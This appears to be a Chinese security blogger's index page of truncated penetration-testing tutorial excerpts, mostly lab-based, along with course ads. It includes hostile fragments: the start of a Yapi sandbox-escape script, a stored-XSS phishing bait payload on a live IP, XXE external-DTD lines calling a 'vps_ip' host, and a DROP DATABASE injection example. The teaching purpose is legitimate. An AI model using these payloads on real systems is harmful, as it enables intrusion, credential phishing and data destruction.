liguangyao213的博客

这里的独立做业务并不是值得真的自己去跑客户，去签单子，而是由独立交付衍生出来的，举个例子，之前我在某金融项目做项目经理的时候客户很认可，因为跟用户合作时总是为用户着想，无论是否在合同内的，能帮用户解决的问题都会帮他解决，客户很认可，慢慢的和客户也成了技术上的朋友，偶尔也会约着吃吃饭啥的（没有商业上利益，当然就靠我们技术这点工资也不可能会有），后来我跳槽去了另外一家公司，这个客户不知道怎么了解到了，直接给我打电话让我来参与下，我带着销售直奔而去，不用想单子肯定拿下了。我觉得人的脆弱和坚强都超乎自己的想象。

web渗透测试最全实战课程--渗透测试视频教程-信息安全-优快云程序员研修院文件上传漏洞的相关讲解基于upload-labs靶场，搭建教程见文件上传漏洞靶机搭建教程::$DATA绕过补充知识 Windows本地文件系统中的文件流(File Streams)： 当从 Windows shell 命令行指定创建文件时，流的完整名称为 "filename:stream name:stream type"，如示例中所示： "myfile.txt:stream1:$DATA"

APP渗透测试之代理篇-Array-渗透测试视频教程-信息安全-优快云程序员研修院了解如何抓取APP数据包 了解APP数据包修改方法-Arrayhttps://edu.youkuaiyun.com/course/detail/26468一、声明大家都知道android7.0以上， 有android的机制不在信任用户证书，导致https协议无法抓包。除非把证书装在系统信任的证书里，此时手机需要root权限。大家都知道root手机是非常繁琐的，对于大多数来说是不切实际的，那android7.0以上有没有不需要

APP、小程序抓包，测试教学视频请观看：Android安全逆向技术入门课程--移动安全视频教程-信息安全-优快云程序员研修院熟悉了解Android程序APK的基本结构、文件格式 掌握APK反编译常用工具 能够学会绕过常见VIP限制-https://edu.youkuaiyun.com/course/detail/361760x00. 小程序抓包测试1.1 抓包前言先说说问题微信小程序无法抓包主要的原因在 Android7.0 及以上的系统中，每个应用可以定义自己的可信 CA 证书。默...

https://edu.youkuaiyun.com/course/detail/35976http://渗透测试中三种扫描器联合使用，躺着也能收漏洞0x01 工具介绍本工具针对AWVS14开发扫描扫描脚本，支持常见的CVE\Bug Bounty\常见高危\SQL插件\log4j等漏洞漏洞的，并且支持扫描联合xray、Burp、w13scan等多种部署扫描版本，自定义扫描脚本。0x02 工具详情config.ini 请使用编辑器更改，记事本会改会原有格式。1 【批量添加url到AWVS扫描器扫

应急响应课程：csdn应急响应课程病毒分析PCHunter：http://www.xuetr.com火绒剑：https://www.huorong.cnProcess Explorer：https://docs.microsoft.com/zh-cn/sysinternals/downloads/process-explorerprocesshacker：https://processhacker.sourceforge.io/downloads.phpautoruns：https://d

在一次授权测试中碰到一种密文，当时无法解出明文，当结束后对这种难缠的加密算法进行了学习，因此产生了这篇文章。密文形式如下图所示：经查询为Bcryp加密，而且同一明文密码经过加密后生成的密文不是相同的，比如我们尝试加密123456789两次加密的结果如下所示：本次学习采用Spring Security crypto 项目实现的BCrypt加密，对该项目中生成密文的步骤进行一步一步的分析调试，发现BCrypt加密算法是先随机生成salt，然后使用随机生成的salt与明文密码进行计..

下载phpstudy,下载地址:Windows版phpstudy下载 - 小皮面板(phpstudy)下载完成，解压后文件目录如下:：双击exe文件进行快速安装即可进行安装：安装完成后双击图标，面板显示为下图：到此phpstudy安装完成，下一步进行sql-lib靶场下载，下载地址：https://github.com/Audi-1/sqli-labs下载完成后将解压文复制到phpstudy的WWW目录下，默认安装情况下phpstudy的目录路径为C:\php..

python环境安装+sqlmap快捷方式创建教程因为sqlmap是用python语言编写所以我们在使用sqlmap之前要先安装python环境python下载地址：Download Python | Python.org选择适合自己操作系统的版本下载成功后双击exe文件自动安装点击安装后会出现安装进度条待安装完毕，会出现以下界面，代表你安装成功了。win+r 输入cmd后回车打开命令行界面在命令行界面输入python -V查看环境变量

  疫情在家办公，这时接到boss的电话说要做一个流量分析，老板发话干就干。对恶意告警分析差不多了，没事翻一翻流量，结果意外发现一个大宝贝！就这样开始了与Yapi的美丽邂逅。高兴之余赶紧注册账户，写入恶意脚本。const sandbox = thisconst ObjectConstructor = this.constructorconst FunctionConstructor = ObjectConstructor.constructorconst myfun = Funct

下载xss_platformdocker search xssxss平台没有统一的名称，只能按照xss关键词来进行搜索定位到之后进行下载docker pull wushangleon/xss_platform启动docker，这里我用一个不常用的8001端口做映射docker run -d --name=xss_platform -p 8001:80 wushangleon/xss_platformdocker ps #查看已经启动浏览器访问：http://ip:8001/配置

AWVS下载先在docker中查找AWVS各个版本docker search awvs毫无以为，我们选择STARS（下载量）最多的，第一个docker pull secfa/docker-awvs #要拼网速哦docker images #执行完后可以看到secfa/docker-awvs镜像到这一步，镜像已经下载完成，下面就是启动使用了。AWVS镜像启动docker run -it -d -p 13443:3443 secfa/docker-awvs #AWVS默认

原理：使用者提交的XSS代码被存储到服务器上的数据库里或页面或某个上传文件里，导致用户访问页面展示的内容时直接触发xss代码。 输入内容后直接在下方回显，回显的地方就是我们插入的内容的地方。根据显示代码进行闭合弹框尝试，payload：黑客一般都会使用存储型xss进行钓鱼。 在pikachu平台自带有钓鱼功能,鱼饵:http://81.68.155.178:82/pkxss/xfish/fish.php将上面的鱼饵写入到我们的存储型xss中，然后引诱鱼儿上钩：payload:&

这里实验使用的是：pikachu靶场：area39/pikachu可以直接使用 docker pull area39/pikachu 下载容器，并启动，也可以使用小编的靶场练习，小编靶场地址：​​http://150.158.23.229:8000/​​ 原理：用户请求一个包含JavaScript的特殊URL，会由攻击者提交。然后服务器响应里不会包含攻击者的脚本，当用户的浏览器处理该响应时，这段攻击代码被前端JS里的DOM处理操作引发。基于DOM的XSS是不需要与服务器交互的，只发生在客...

原理：服务器接收get或者post请求时，未对数据进行合理处置，直接响应到前端页面上。GET请求http://81.68.155.178:82/vul/xss/xss_reflected_get.php长度限制，先取消长度限制，再进行xss测试POST请求POST请求是为了模拟后台用户登录后存在XSS的环境。POST请求登录后其实就是进入了网站的后台，更方便来调取cookie。admin/123456 登录后和上面的GET请求就一样了，只是登录后会产生有cookie登录后：

更多渗透课程可以点我头像看我的视频哦，也可以点击下面链接web渗透测试最全实战课程--渗透测试视频教程-信息安全-优快云程序员研修院JavaScript介绍JavaScript（简称“JS”） 是一种具有函数优先的轻量级，解释型或即时编译型的编程语言。也就是脚本语言。JavaScript和Java的关系区别呢？JavaScript和Java没什么关系，两种不同的语言。JavaScript作用JavaScript被广泛用于Web应用开发，常用来为网页添加各式各样的动态功能,为

Goby：Goby是针对目标企业梳理最全面的工具，同构goby可以清晰的扫描出ip地址开放的端口，以及端口对应的服务，于此同事会根据开放的端口及应用进行实战化的测试，并不在乎他的中低危害漏洞，而更在乎的是它能直接getshell的漏洞。AWVS：AWVS这款工具大家应该都比较熟悉了，他是针对web的轻量级的漏洞扫描工具。也就是根据我们提供的被扫描地址，快速的扫描出其所有的漏洞，包含高中低及信息泄露等漏洞。Goby+AWVS:结合我们前面的介绍，大家想想，Goby探测出ip地址开放

背景：什么是安全检查，安全检查就是你的监管部门对你的网络进行安全检查，检查是否符合规定（这里只聊技术性的检查），比如通过攻防演习对你的系统进行检查或者通过渗透测试对你的系统进行检查，而在被检查前作为被检查单位往往要做很多工作，防止在被检查过程中检查处很多问题，而这时有个新的名词叫：迎检，也就是迎接检查的意思，前些年迎检在运营商行业特别的常见，近些年随着国家对网络安全的重视，比如电力、金融、基础设施、大型互联网等越来越多的被自己的监管部门所检查。面对迎检我们应该做什么？秉持一个原则：最小化原则，什么叫

介绍：web渗透实训平台，耗时2个月开发出来的一个专门练习的靶机平台，平台中将漏洞分为高、中、低三个级别，并按照漏洞类型进行了分类，里面共涉及50个实验环境，每个实验环境对应的答案也都在靶机中，方便新手入门时进行参考，下面就是实训平台的登录界面。靶场：整个靶场从类型上分为了web靶场和cms靶场，web靶场主要是漏洞知识点的练习，里面是一个个漏洞的练习，同时对应writeup随意截取一个writeupcms靶机里面搭建的都是开源的cms网站搭建的，并且附有writeup哦。

0x00 前言当企业发生黑客入侵、系统崩溃或其它影响业务正常运行的安全事件时，急需第一时间进行处理，使企业的网络信息系统在最短时间内恢复正常工作，进一步查找入侵来源，还原入侵事故过程，同时给出解决方案与防范措施，为企业挽回或减少经济损失。针对常见的攻击事件，结合工作中应急响应事件分析和解决的方法，总结了一些Linux服务器入侵排查的思路。0x01 入侵排查思路1.1 账号安全基...

引用外部DTD文件访问内网主机/端口。<!DOCTYPE a SYSTEM "http://127.0.0.1:2333"> （看响应时间） 引用外部DTD文件访问外网。<!DOCTYPE a SYSTEM "http://vps_ip" > 引用内部实体。<!DOCTYPE a [<!ENTITY xxe...

1 文件分析1.1 临时目录排查黑客往往可能将病毒放在临时目录（tmp/temp），或者将病毒相关文件释放到临时目录，因此需要检查临时目录是否存在异常文件。假设系统盘在C盘，则通常情况下的临时目录如下：C:\Users\[用户名]\Local Settings\TempC:\Documents and Settings\[用户名]\Local Settings\TempC:...

随着国家对信息安全的重视，信息安全技术人才缺口也越来越大，可能5年前信息安全还是小众行业，不过5年后一定是大家都熟悉的行业，网络已经是大家每天不可缺少的东西，如果你不懂里面的安全，那你的工作生活肯定会受到影响。为什么说信息安全火，那么首先他是国家的战略：“没有网络安全，就没有国家安全”如果只是国家出来喊一喊，没有工作给大家提供那肯定是不行的，下面我们来看一下2018年boss直聘做的统...

SQL注入是网站漏洞中常见的一种高危漏洞，该漏洞一旦被利用极大可能将数据库脱掉。看下面这幅图，这可是个很有技术含量的号牌遮挡！！这幅图中字幕满足sql注入中三个条件：闭合代码中sql注入语法 ZU 0666’,0,0); 写入自己想操作的语句 DROP DATABASE TABLICE; 注释掉后台代码中其他sql语句 --SQL注入原理...